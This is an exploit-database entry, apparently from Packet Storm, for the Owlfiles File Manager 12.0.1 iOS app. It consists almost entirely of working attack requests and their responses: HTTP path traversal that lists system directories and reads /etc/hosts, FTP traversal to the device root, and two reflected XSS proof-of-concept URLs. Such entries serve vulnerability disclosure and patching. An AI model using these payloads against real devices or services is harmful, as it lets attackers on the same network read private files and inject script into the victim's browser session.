Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:168414 # Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities # Date: Sep 19, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524 # Version: 12.0.1 # Tested on: Ios 16.0 ########### path traversal on HTTP built-in server ########### GET /../../../../../../../../../../../../../../../System/ HTTP/1.1 Host: 192.168.8.101:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 If-None-Match: 42638202/1663558201/177889085 If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT Connection: close Content-Length: 0 ------- HTTP/1.1 200 OK Cache-Control: max-age=3600, public Content-Length: 317 Content-Type: text/html; charset=utf-8 Connection: Close Server: GCDWebUploader Date: Mon, 19 Sep 2022 05:01:11 GMT <!DOCTYPE html> <html><head><meta charset="utf-8"></head><body> <ul> <li><a href="Cryptexes/">Cryptexes/</a></li> <li><a href="DriverKit/">DriverKit/</a></li> <li><a href="Library/">Library/</a></li> <li><a href="Applications/">Applications/</a></li> <li><a href="Developer/">Developer/</a></li> </ul> </body></html> ############# LFI on HTTP built-in server ############# GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 Host: 192.168.8.101:8080 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 X-Requested-With: XMLHttpRequest Referer: http://192.168.8.101:8080/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ---- HTTP/1.1 200 OK Connection: Close Server: GCDWebUploader Content-Type: application/octet-stream Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT Date: Mon, 19 Sep 2022 03:28:14 GMT Content-Length: 213 Cache-Control: max-age=3600, public Etag: 1152921500312187994/1662169021/0 ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost ############### path traversal on FTP built-in server ############### ftp> cd ../../../../../../../../../ 250 OK. Current directory is /../../../../../../../../../ ftp> ls 200 PORT command successful. 150 Accepted data connection total 10 drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin drwxr-xr-x 0 root wheel 224 Jan 01 1970 System drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library drwxr-xr-x 0 root wheel 224 Jan 01 1970 private drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer drwxr-xr-x 0 root admin 64 Jan 01 1970 cores WARNING! 10 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. ftp> ############# XSS on HTTP built-in server ############# poc 1: http://192.168.8.101:8080/download?path=<script>alert(rose)</script> poc 2: http://192.168.8.101:8080/list?path=<script>alert(rose)</script>